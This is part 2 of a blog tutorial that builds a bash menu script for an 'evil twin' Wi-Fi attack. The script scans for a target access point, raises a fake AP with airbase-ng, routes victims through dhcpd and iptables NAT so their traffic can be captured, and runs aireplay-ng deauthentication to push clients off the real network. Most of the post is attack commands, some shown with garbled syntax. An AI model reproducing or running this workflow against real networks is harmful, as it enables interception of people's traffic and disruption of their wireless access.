Evil Twin (Part 2) - Creating the Bash Script.
Back for the second part,
Just to recap in part one, we installed and configured the dhcp server. This will allow us to pass our clients requests out to the internet. This is a very important step in the evil twin attack because if your targets (clients) can't make it out to the WWW, they will assume something is wrong. In all reality the attack wont work because we are trying to capture their traffic. So we must provide that with the help of the dhcp server.
In this post I will go through the steps of setting up the bash script. Here is a screenshot of the menu page from here I will explain the steps to building the script. Do to the massive length of this post i will be post the entire bash script on its own post with links to the 2 previous post(the dhcp set up and this post).
In the terminal cd to the directory where you would like to create your bash script, I will create mine in a directory called scripts within my home directory
- cd to home directory: cd ~
- make the scripts directory: mkdir scripts
- run the text editor: nano
- The very first line must be: #!/bin/bash
- The first function(option0) just asks what is your monitor mode wifi adapter. this is set when you first launch the script and you only need to change this if you change your adapter(which I can't see why you would)
echo "Enter your monitor mode interface (wlan1mon): "
- The second function(option1) just runs a basic airodump-ng command so that you can find your target.
gnome-terminal -x airodump-ng $interface &
- The third function(option2) runs airodump-ng command again but this time with switches so you can hone in on your target AP.
while -z $bssid ; do
echo "Enter the BSSID: "
while -z $channel ; do
echo "Enter the Channel: "
echo "Write File Prefix: "
if -z $writeFilePrefix ; then
echo "No Write File Specified"
writeFile=" -w $writeFilePrefix"
gnome-terminal -x airodump-ng --bssid $bssid -c $channel $writeFile $interface &
- The fourth function(option3) sets up and runs the evil twin. You will be prompted for input to set up the Evil Twin AP. It will then kill a couple processes dhcpd and airbase-ng. Then the airbase-ng command will run. After that you will be prompted for some more input to set up the dhcp server. The ip tables will be build and then we start the dhcpd service. The final step is to forward ip's. Our clients/target can hit the WWW.
echo "Time to set up the Evil Twin AP!!!"
echo "Evil Twin ESSID: "
if -z $etEssid ; then
echo "ESSID not set"
options3="$options3 --essid $etEssid"
echo "Evil Twin BSSIDoptional: "
if -z $etBssid ; then
echo "BSSID not set"
options3="$options3 -a $etBssid"
echo "Enter the Channel: "
if -z $etChannel ; then
echo "Channel not set"
options3="$options3 -c $etChannel"
echo "Enter the host MAC(client connected to target AP)optional: "
if -z $etHost ; then
echo "Host MAC not set"
options3="$options3 -h $etHost"
echo "Killing Airbase-ng..."
echo "Killing DHCP..."
echo "Starting Fake AP..."
gnome-terminal -x airbase-ng $options3 $interface &
echo "Starting DHCP Server..."
while -z $etInterface ; do
echo "Enter Evil Twin Interface"
while -z $etNetwork ; do
echo "Enter Evil Twin Network (example: 10.0.0.0)"
ifconfig $etInterface up
echo "These next two setting MUST!!! match the setting in your dhcpd.conf file"
while -z $etIP ; do
echo "Enter Evil Twin IPv4 Address"
while -z $etNetmask ; do
echo "Enter Evil Twin netmask"
while -z $etOutInterface ; do
echo "Enter your internet faceing interface:"
ifconfig $etInterface up
ifconfig $etInterface $etIP netmask $etNetmask
route add -net $etNetwork netmask $etNetmask gw $etIP
iptables --table nat --flush
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $etOutInterface -j MASQUERADE
echo > '/var/lib/dhcp/dhcpd.leases'
ln -s /var/run/dhcp/dhcpd.pid /var/run/dhcpd.pid
gnome-terminal -x dhcpd -d -f -cf /etc/dhcp/dhcpd.conf $etInterface &
echo "1" > /proc/sys/net/ipv4/ipforward
- The fifth function(option4) runs a aireplay-ng command to kick all the clients off of the real AP.
while -z $deauthType ; do
echo "Would you like to run a basic deauth attack? (--deauth 100)"
echo "1 Yes"
echo "2 No"
echo "you selected $deauthType"
if $deauthType = 1 ; then
gnome-terminal -x aireplay-ng --deauth 100 -a $bssid $interface &
if $deauthType = 2 ; then
echo "Enter your aireplay-ng options, you must add the -a tag, and DO NOT include the interface"
gnome-terminal -x aireplay-ng $options4 $interface &
- The sixth function(option5) runs some pkill commands to stop all the processes we started and then closes the terminal.
echo "Killing airbase-ng"
echo "Killing dhcpd"
echo "Killing aireplay-ng"
echo "Killing airodump-ng"
- Then a function that will display the menu.
echo "What would you like to do?"
echo "0 set up interface"
echo "1 find the target"
echo "2 hone in on target"
echo "3 set up Evil-Twin AP"
echo "4 deauth the target AP"
echo "5 exit"
- And lastly a function to take action on the user input.
case $userInput in
0) option0 ;;
1) option1 ;;
2) option2 ;;
3) option3 ;;
4) option4 ;;
5) option5 ;;
- First we will echo some intro text ( i will leave that out to shorten this already colossal post).
- Then some valuable info will be echo'd
echo "You MUST set your usb Wifi adapter in monitor mode first"
echo "You MUST have DHCP server installed and configured"
echo "Then follow the steps 1-5"
echo "This will help set up an Evil Twin AP"
- We then set the user input variable to null and the interface variable to null
- Run a while loop until the user enters the monitor mode interface. Its pointless to let a user go past this point as you must have a monitor mode interface to make things work.
while -z $interface ; do
- Now we run a loop to keep repeating the menu until the user decides to exit the script.
until $uI = 5 ; do
#echo "you selected $uI hello"
I hope this post was not too long, There was just a lot to cover, also this is my VERY FIRST BASH SCRIPT, so please provide me with any and all comments as I like to see others input and maybe there is an easier way to accomplish this.
As always thank you for reading and I hope this post helps make someones life easier.
The link to the full code is here .